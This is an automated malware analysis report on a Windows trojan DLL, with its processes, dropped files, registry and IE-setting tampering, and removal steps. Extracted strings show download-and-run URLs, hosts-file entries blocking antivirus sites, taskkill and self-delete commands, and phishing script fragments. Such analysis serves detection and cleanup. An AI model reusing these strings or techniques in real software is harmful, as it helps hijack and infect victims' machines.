MD5: ef50bb6aed4044c5b61d6642583ab769
SHA1: 41dd818e62e58081faa3f4b849874e6904bc3bb1
SHA256: 373190468904a0ea82cc76a7ce181b705942ae3785dd3107bbbfdf4e43181ee2
SSDeep: 768:MVCub7ChDTieMB9IqaoWuHnhmqUCai 4USlayHDojY9P7:927YDGl3Iq7WuHEqUExlayH2mj
Size: 50688 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2010-09-14 11:27:39
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676

The Trojan injects its code into the following process(es):

QQExtrenal.exe:1300
svchost.exe:432

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mhrma.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\jarinet\QQExtrenal.exe (28 bytes)

The process regsvr32.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)

The process QQExtrenal.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)

The process hrl1.tmp:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\iigmiy.exe (36 bytes)

Registry activity

The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 DB 30 AE A5 DB 97 8D 99 E7 79 A3 DC B8 60 EC"

The process mhrma.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 0F 4D 4A 83 33 98 BD 1D A0 94 83 BD 6D DB F5"

The process lssaa.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 51 E8 3A C0 50 D7 AF 2E 6C AA 0E 1C 21 B1 85"

The process regsvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA EB 2F DE F5 35 81 8D EF 07 3A 9D E1 F4 AB 9D"

The process QQExtrenal.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 BD 70 FB 9C CA 4E E1 C1 A5 7C DE 25 EE 8F 41"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process hrl1.tmp:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 68 F3 49 6B FF 05 2B 7D 3A 1B 51 89 B7 28 66"

[HKLM\System\CurrentControlSet\Services\Nationalreo]
"Description" = "Providesfht a domain server for NI security."

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 402 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://192.240.107.44/toopu2.png
www.mojimojimojimoji.com	198.15.148.34

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Traffic

GET /toopu2.png HTTP/1.1

Accept: */*

Referer: 

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

Host: 192.240.107.44

Connection: Keep-Alive

Cookie: 

HTTP/1.1 200 OK

Content-Type: image/png

Last-Modified: Thu, 28 Apr 2016 03:24:07 GMT

Accept-Ranges: bytes

ETag: "9c2a476cfda0d11:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 30 May 2016 22:15:32 GMT

Content-Length: 286377
.PNG........IHDR...9...9.......s.....tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:967CD4C7D4E611E39675E1BAB4
918499" xmpMM:DocumentID="xmp.did:967CD4C8D4E611E39675E1BAB4918499">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:967CD4C5D4E611E39675
E1BAB4918499" stRef:documentID="xmp.did:967CD4C6D4E611E39675E1BAB49184
99"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>uU.~....PLTE........e..$.....W..l..}ygH.....!
....X............z...vkW.........|uk......................j;..........
.^.......x......#.wF.kE.{&..G........1.v5....z......T..K..*....rY....h
&...UG...U.................~........7..J....n.lF...C....xd..2..{..:yc&
lt;..(.k(.v...~.t.....l.lM.wY'...........,.}[email protected].......
qD..q.....N.....~...wR.R;.zS............y..93*.....y.....|c.u.lT*...f[
I........j....{s..]..X...........B.....&.....j..M..........z^.qQZA..~.
.....9...........T.............v`......kX9.....C...mg^.....5.z...xzo\.
..yI......St^9.~...J.g............{............^UF..........^!....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.rsrc

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

ole32.dll

regsvr32.pdb

_wcmdln

RegCloseKey

RegOpenKeyExW

Excessive # of DLL's on cmdline

5.1.2600.5512 (xpsp.080413-2105)

REGSVR32.EXE

Windows

Operating System

5.1.2600.5512

Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall

Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.

LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.

%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.

OleUninitialize failed.["%1" is not an executable file and no registration

svchost.exe_432:

.text

`.rdata

@.data

.rsrc

ADVAPI32.dll

USER32.dll

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

RegCloseKey

RegOpenKeyExA

RegOpenKeyA

SHLWAPI.dll

ShellExecuteA

SHELL32.dll

WS2_32.dll

MSVCRT.dll

_acmdln

WinExec

KERNEL32.dll

0.0.0.0

hXXp://VVV.mojimojimojimoji.com/testq.html

VVV.mojimojimojimoji.com:8088

%u.%u.%u.%u

hra%u.dll

iexplore.exe

stf%c%c%c%c%c.exe

URLDownloadToFileA

urlmon.dll

%c%c%c%c%c.exe

PlusCtrl.dll

%c%c%c%c%c%c.exe

%u MB

%u MHz

Windows NT

Windows 7

Windows 2008

Windows Vista

Windows 2003

Windows XP

Windows 2000

SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Program Files\Internet Explorer\iexplore.exe

#0%s!

%s/%s

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d.%d.%d.%d

192.168.1.244

svchost.exe

ntdll.dll

@.reloc

lpk.dll

cmd /c RD /s /q "%s"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" x "%s" *.exe "%s\"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

rar.exe

svchost.exe_432_rwx_00400000_0000C000:

.text

`.rdata

@.data

.rsrc

ADVAPI32.dll

USER32.dll

GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm

RegCloseKey

RegOpenKeyExA

RegOpenKeyA

SHLWAPI.dll

ShellExecuteA

SHELL32.dll

WS2_32.dll

MSVCRT.dll

_acmdln

WinExec

KERNEL32.dll

0.0.0.0

hXXp://VVV.mojimojimojimoji.com/testq.html

VVV.mojimojimojimoji.com:8088

%u.%u.%u.%u

hra%u.dll

iexplore.exe

stf%c%c%c%c%c.exe

URLDownloadToFileA

urlmon.dll

%c%c%c%c%c.exe

PlusCtrl.dll

%c%c%c%c%c%c.exe

%u MB

%u MHz

Windows NT

Windows 7

Windows 2008

Windows Vista

Windows 2003

Windows XP

Windows 2000

SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Program Files\Internet Explorer\iexplore.exe

#0%s!

%s/%s

GET %s HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)

Host: %s:%d

Host: %s

User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0

Referer: hXXp://%s:80/hXXp://%s

%s %s%s

User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)

User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

%d.%d.%d.%d

192.168.1.244

svchost.exe

ntdll.dll

@.reloc

lpk.dll

cmd /c RD /s /q "%s"

"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"

"%s" x "%s" *.exe "%s\"

cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"

rar.exe

QQExtrenal.exe_1300:

.text

`.data

.rsrc

MSVBVM60.DLL

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

127.0.0.1 VVV.ijinshan.com

127.0.0.1 VVV.360.cn

127.0.0.1 VVV.rising.com.cn

127.0.0.1 kaba365.com

xxD.Downloader

VB5!6&vb6chs.dll

D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

advapi32.dll

RegCreateKeyA

RegCloseKey

VBA6.DLL

c:\windows\system32\jarinet

cmd /c taskkill /f /im QQExtrenal.exe

hXXp://

%System%\drivers\etc\hosts

Microsoft.XMLHTTP

Adodb.Stream

c:\windows\inf\

Software\Microsoft\Windows\CurrentVersion\Run

c:\windows\system32\jarinet\QQExtrenal.exe

c:\windows\system32\jarinet\QQExtrenal.exe "

.exe"

xxDown.exe

lssaa.exe_1472:

.text

`.rdata

@.data

__MSVCRT_HEAP_SELECT

user32.dll

KERNEL32.dll

USER32.dll

ADVAPI32.dll

WS2_32.dll

GetCPInfo

.rsrc

GET %s HTTP/1.1

Referer: %s

Accept-Language: %s

User-Agent: %s

Host: %s

Cookie: %s

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)

hXXp://192.240.107.44/toopu2.png

c:\windows\inf\lssaa.exe

comine.exe_212:

.text

`.data

.rsrc

MSVBVM60.DLL

vb6chs.dll

d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB

psapi.dll

kernel32.dll

NTDLL.DLL

shell32.dll

SHFileOperationA

ShellExecuteA

VBA6.DLL

1.vbp

hXXp://VVV.hao12338.com/?index

IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE

%Program Files%\Windows Media Player

%Program Files%

explorer.exe

WScript.Shell

Iexplore.exe

wscript.shell

cmd /c ping 127.0.0.1 -n 2&del

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows

%Program Files%\Windows Media Player\comine.exe

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

%Program Files%\Internet Explorer\iexplore.exe

WindowStyle

Hotkey

serv.dat

spolsv.exe_1536:

.text

`.rdata

@.data

__MSVCRT_HEAP_SELECT

user32.dll

WinExec

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

InternetOpenUrlA

FindCloseUrlCache

FindNextUrlCacheEntryA

DeleteUrlCacheEntry

FindFirstUrlCacheEntryA

WININET.dll

URLDownloadToFileA

urlmon.dll

GetCPInfo

Software\Microsoft\Windows\CurrentVersion\Run

127.0.0.1 VVV.360.cn

127.0.0.1 VVV.kaspersky.com.cn

127.0.0.1 VVV.ijinshan.com

127.0.0.1 VVV.rising.com.cn

127.0.0.1 cn.trendmicro.com

127.0.0.1 VVV.symantec.com

127.0.0.1 sd.360.cn

127.0.0.1 VVV.eset.com.cn

127.0.0.1 VVV.avast.com

127.0.0.1 VVV.micropoint.com.cn

127.0.0.1 VVV.avira.com

127.0.0.1 VVV.avg.com

127.0.0.1 VVV.jiangmin.com

127.0.0.1 VVV.ggsafe.com

127.0.0.1 guanjia.qq.com

hXXp://192.240.107.42:8914/test/shua.txt

hXXp://192.240.107.42:8914/test/down.txt

%Program Files%\Internet Explorer\iexplore.exe

del "%s"

if exist "%s" goto nimei

del_.bat

hXXp://

spolsv.exe

\spolsv.exe

conime.exe

%WinDir%\spolsv.exe

lll.exe_1840:

.text

`.rdata

@.data

KERNEL32.dll

EnumWindows

USER32.dll

RegCloseKey

RegOpenKeyExA

ADVAPI32.dll

WS2_32.dll

MSVCP60.dll

MSVCRT.dll

DeleteUrlCacheEntry

WININET.dll

URLDownloadToFileA

urlmon.dll

hXXp://124.232.158.94:1932/index.htm

201508100029

124.232.158.94

dk.23145.com

Applications\iexplore.exe\SHELL\OPEN\COMMAND

%s?%c%c%c%c%c

%s%c%c%c%c%c.htm

122.224.34.79

iexplore.exe_900:

%?9-*09,*19}*09

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.Fg

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

te.exe_1244:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

0123456789

oleaut32.dll

EVariantBadIndexError

127.0.0.1

hXXp://

ole32.dll

Software\Microsoft\Windows\CurrentVersion\Internet Settings

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Accepted Documents

Windows NT

self.location

window.location=document.URL "

.URL "

window.location=

var customer = getCookie("safe");if (customer != "ver3.1.2"){alert("

MSScriptControl.ScriptControl.1

document.write(eval("

document.write(

URL "

window.location

document.URL 

window.history.forward(1);

?jdfwkey

jdfwkey

document.getElementsByTagName

= document.getElementById("num").value

ssfwkey

window.history.forward(1)

window.confirm("

ment.URL 

InternetExplorer.Application

HTTP/1.1

location="/codeimg.htm"

/codeimg.htm

TLoginSock$

2, ip/port

,web complete

httpref:

2000000000

/safe123.jsp

/safe123.jsp?username=

&key=

con.document.write('</body>'

con.document.write('

/login.jsp?username

/login.jsp

ipspro.jsp?

flash.swf

/ecatflash.swf

<script>window.close

aqdkey:

/codeflash.htm

69.165.66.213

fdipport:

23.251.41.170

user32.dll

GetKeyboardType

advapi32.dll

RegOpenKeyExA

RegCloseKey

RegQueryInfoKeyA

RegFlushKey

RegCreateKeyExA

WinExec

GetCPInfo

wsock32.dll

wininet.dll

InternetOpenUrlA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

DeleteUrlCacheEntry

1 1$1(1,1014181<1@1\1|1

3 3$3(3,3034383<3\3|3

2!2%2)2-21252~2

00X0r0z0

KWindows

HuntHTTPDownload

vUCmdList

/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

Cannot assign a %s to a %s%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

Failed to get data for '%s'

%s.Seek not implemented$Operation not allowed on sorted list

OLE error %.8x.Method '%s' not supported by automation object

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation

Invalid NULL variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

External exception %x

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

I/O error %d

Integer overflow Invalid floating point operation

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   taskkill.exe:1228
   mhrma.exe:1976
   lssaa.exe:1472
   regsvr32.exe:560
   hrl1.tmp:1676
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\jarinet\QQExtrenal.exe (28 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
   %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
   %WinDir%\inf\lssaa.exe (45 bytes)
   %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
   %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
   %System%\drivers\etc\hosts (898 bytes)
   %System%\iigmiy.exe (36 bytes)

4. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.